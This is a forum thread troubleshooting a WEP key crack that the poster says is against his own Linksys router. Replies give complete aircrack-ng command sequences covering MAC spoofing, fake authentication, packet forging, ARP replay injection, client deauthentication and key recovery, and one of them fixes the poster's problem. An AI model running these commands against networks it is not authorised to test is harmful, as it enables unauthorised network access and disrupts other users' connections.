Results 1 to 8 of 8

Thread: Can't seem to crack WEP, despite following instructions

  1. #1
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Question Can't seem to crack WEP, despite following instructions

    Hi everyone, I imagine you probably get asked this question quite frequently, but I've looked around for an answer to my question and I haven't found anything. I tried cracking the WEP encryption (128- bit hex) on my Linksys WRT54GS' wireless signal using my Acer Aspire One (with the integrated Atheros Wi- Fi chip), but when I reach the final step where I launch aircrack, the amount of IVs never goes above 31. In addition, my interface seems to be very strange. It looks like ath0 is a VAP created by wifi0 or something like that. These are the steps I followed.

    - Open konsole
    - airmon-ng stop ath0
    - ifconfig wifi0 down
    - macchanger -m 00:11:22:33:44:55 wifi0
    - airmon-ng start wifi0
    - airodump-ng ath0
    - Press Ctrl+C to stop scan
    - airodump-ng -c [channel, in my case, 3] -w wep --bssid [MAC address of AP] ath0
    - Open new konsole, leaving old one open in background
    - aireplay-ng -1 0 -a [MAC address of AP] -h 00:11:22:33:44:55 ath0
    - aireplay-ng -5 -b [MAC address of AP] -h 00:11:22:33:44:55 ath0
    - packetforge-ng -0 -a [MAC address of AP] -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y [location of keystream] -w ARP
    - aireplay-ng -2 -r ARP ath0
    - Open new konsole, leaving both of the old ones open in the background
    *NOTE: Up to this point, everything seemed to work similarly to the way it worked in the video*
    - aircrack-ng wep-01.cap
    *At the part where it says "got x IVS", it never increases from 31, no matter how long I leave it. Does anyone know what was wrong with this method? Thanks in advance for a reply.*

  2. #2
    Junior Member
    Join Date
    Mar 2010
    Posts
    44

    Default

    Sorry, no idea, have you tried isolating different parts of this process from the rest? Kismet, for instance can put you computer into monitor mode (automatically) and also collects ivs (and other things). Does the same problem arise with Kismet? Or when using iwconfig in place of airmon-ng? Perhaps your copy of aircrack-ng results from a bad download, you might try reinstalling it. Finding out what does work ought to help you figure out what doesn't. Please report back to us, I for one am curious about your situation. Good luck, Kurt

  3. #3
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default

    Hi, thanks for the quick response. I've tried isolating parts of the procedure, but it seems that everything works fine save for that final aircrack-ng wep-01.cap command. If I try to open Kismet, it gives me this error message:

    Suid priv-dropping disabled. This may not be secure.
    No specific sources given to be enabled, all will be enabled
    Enabling channel hopping
    Enabling channel splitting.
    FATAL: No packsources were enabled. Make sure that if you use an enablesource line that you specify the correct sources

  4. #4
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default

    Hi, thanks for the quick response. I've tried isolating parts of the procedure, but it seems that everything works fine save for that final aircrack-ng wep-01.cap command. If I try to open Kismet, it gives me this error message:

    Suid priv-dropping disabled. This may not be secure.
    No specific sources given to be enabled, all will be enabled
    Enabling channel hopping
    Enabling channel splitting.
    FATAL: No packsources were enabled. Make sure that if you use an enablesource line that you specify the correct sources

  5. #5
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    The basic commands I use, after bringing your card into monitor mode and substituting names where applicable, are:

    Code:
    airodump-ng -c 3 --bssid 00:01:02:03:04:05 -w dump ath0
    aireplay-ng -1 0 -e "network-name" -a 00:01:02:03:04:05 -h 00:04:05:06:07:08 ath0
    aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 ath0
    aireplay-ng --deauth 5 -a 00:01:02:03:04:05 -c 00:05:06:07:08:09: ath0
    aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
    Try those out and see if the same occurs....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  6. #6
    Just burned his ISO su_pyrow's Avatar
    Join Date
    Jan 2010
    Posts
    11

    Default

    add -b to aircrack-ng
    aircrack-ng wep*.cap -b (mac of ap)

    Hey whats up? Everything looks good. however lets just try something..
    these are the steps you took.. lets add --ivs to step #7 just before ath0

    airodump-ng -c 3 -w wep --bssid (mac of ap) --ivs ath0
    Now... you will have a single and/or series of wep.ivs files. (wep.ivs is from your "-w wep" ABOVE) When it comes time to use aircrack-ng ( 20,000 IVS or so try every 5,000) run it like this:

    aircrack-ng *.ivs -b (mac of ap)
    That will combine all of them together so you should get more than 31 ivs. You probably already have all the files you need; they just need to be combined to be cracked.

    you could try

    aircrack-ng *.cap -b (mac of ap)
    1- airmon-ng stop ath0
    2- ifconfig wifi0 down
    3 macchanger -m 00:11:22:33:44:55 wifi0
    4 airmon-ng start wifi0
    5 airodump-ng ath0
    6 Press Ctrl+C to stop scan
    7 airodump-ng -c 3 -w wep --bssid [MAC AP] ath0
    8 Open new konsole, leaving old one open in background
    9 aireplay-ng -1 0 -a [MAC address of AP] -h 00:11:22:33:44:55 ath0
    10 aireplay-ng -5 -b [MAC address of AP] -h 00:11:22:33:44:55 ath0
    ......

    See how that works.

  7. #7
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    4

    Default

    Thanks a lot! I was able to follow su_pyrow's modifications to make it work flawlessly. All I did was add --ivs to step 7 and change my final aircrack-ng step to:
    aircrack-ng *.ivs -b [AP's MAC address]

    I guess now I'll be setting up a WPA network and trying to crack that. Thanks again!

  8. #8
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    1

    Default Just one question...

    Hi there!

    Im using the very same hardware as you but im a real newbie with linux and i when i fellow your instructions (wich seems to work) i just block at the "LOCATION OF KEYSTREAM" part....

    I just dont figure out what it is.


    ....Im sure someone can help me with that!!!


    Thanks!!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •